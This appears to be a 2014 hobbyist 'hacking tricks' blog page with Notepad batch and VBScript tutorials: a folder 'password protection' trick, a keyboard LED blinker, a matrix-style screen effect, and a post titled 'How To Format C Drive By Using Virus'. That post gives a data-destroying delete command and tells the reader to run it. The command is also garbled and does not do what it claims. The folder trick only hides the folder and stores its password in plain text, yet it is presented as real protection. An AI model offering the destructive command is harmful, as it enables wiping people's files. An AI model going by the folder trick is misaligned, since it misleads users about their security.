Featured Articles

Tricks

All Stories
Showing posts with label Notepad Tricks. Show all posts
Showing posts with label Notepad Tricks. Show all posts

Tuesday, 20 May 2014

How To Protect Any Folder With Password Protected Without Using Any Software

How To Protect Any Folder With Password Protected Without Using Any Software

Learn how to hide and make password protected folder with out using any third party software . If you have any business profiles or any documents want to make them hide and protect them with using password here is the trick which help you .

Tutorial : How To Protect Any Folder With Password Protected Without Using Any Software 


  • Open Notepad and copy the code below .

cls
@ECHO OFF
title besthackinguniversity.blogspot.com
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST besthack goto MDbesthack
:CONFIRM
echo Trick By Besthackinguniversity : Are you sure want to lock this folder? (Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren besthack "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock Your Secure Folder
set/p "pass=>"
if NOT %pass%== besthackinguniversity goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" besthack
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDbesthack
md besthack
echo besthack created successfully
goto End
:End

  • Now save the file as hack.bat 
  • After saving click on the file you will see folder as "besthack" .
  • Move all the required files you want to hide or make password protected .
  • After moving click on  the hack.bat file you see a cmd like below . 



  • Click on 'Y' by using your keyboard .
  • Congo , Now you folder will be hide and it was password protected .



Tip 1 : 

  • If you want to access folder just click on "hack.bat" file a cmd will open .
  • Now it was password protected  .


Password : besthackinguniversity 

Note : If you want to change the password replace the colored text 'besthackingunivresity' with your required one .


Tip 2 :

After all the process all done now move the hack.bat file to any other folder or to an un acessable area where nobody will see .


Like Facebook page and Share our articles .

If you have any suggestions feel free to comment below .

01:36 - By Unknown 0

Friday, 16 May 2014

Keyboard LED Flash Effect (Make a Disco)


Would you like to know how these lights will flash consequently . Ya it is possible with vbs script by using notepad . By activating this trick on your computer all lights on your keyboard will start to blink in a manner .


Tutorial : Keyboard LED Flash Effect (Make a Disco)

  • Open notepad and copy the code below .

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
wshshell.sendkeys "{NUMLOCK}"
wshshell.sendkeys "{SCROLLLOCK}"
loop

  • Save the file as keyboard.vbs .
  • open the file and enjoy .


Note : This effect is to turn off manually .


How To Turn Off : 

  • Open Task manager (CTRL+ALT+DEL) .
  • Now searcch for wscript.exe 
  • click on end process .


If you have any suggestions or querie related feel free to comment below .

04:32 - By Unknown 3

How To Make Matrix Effect In CMD

How To Make Matrix Effect In CMD

Learn how make matrix effect in your computer . Here is the simple notepad trick which makes matrix effect in your cmd . Its just a batch programming file which will select color and it will randomly move in cmd this will make effect to look like matrix effect .


Tutorial : How To Make Matrix Effect In CMD 

  • Open Notepad and Copy the below code .

@echo off
color 02
:start
echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
goto start

  • Now save the file matrix.bat 
  • open file and enjoy the matrix effect .


Note : You also change the colors in effect just change the color2 to any number you will observer other colors .


04:14 - By Unknown 0

Wednesday, 14 May 2014

How To Format C Drive By Using Virus



This virus is a user virus which format c drive in your computer . This virus created by using batch file programming . Make sure do not click on the file unexpectedly .

Note : clicking on file will delete your c:drive .

Tutorial : How To Format C Drive By Using Virus

  • Open Notepad and copy the below program .

@Echo off
Del C:\ *.* |y

  • Now save the file as formatdrive.bat (Name will be optional) .
  • Run the file .


I hope you enjoyed the tutorial .

Have any suggestions or querie related feel free to comment below .
08:44 - By Unknown 0

Best Hacking University


A blog about Best hacking tricks and Tips .

Like and Follow us to get latest updates .

Contact Form

Name

Email *

Message *

Contact Us / Tip

Want to send a tip or contact us about this site contact us by form or by Contact Page

Please send us a tip regarding blog which can help us in making blog much better .

Disclaimer

We reserve the right to change our privacy policy when ever we want and also any comments that are found abusive , offensive , spam and displaying irrelevant text links for any purpose .
Powered by Blogger.
back to top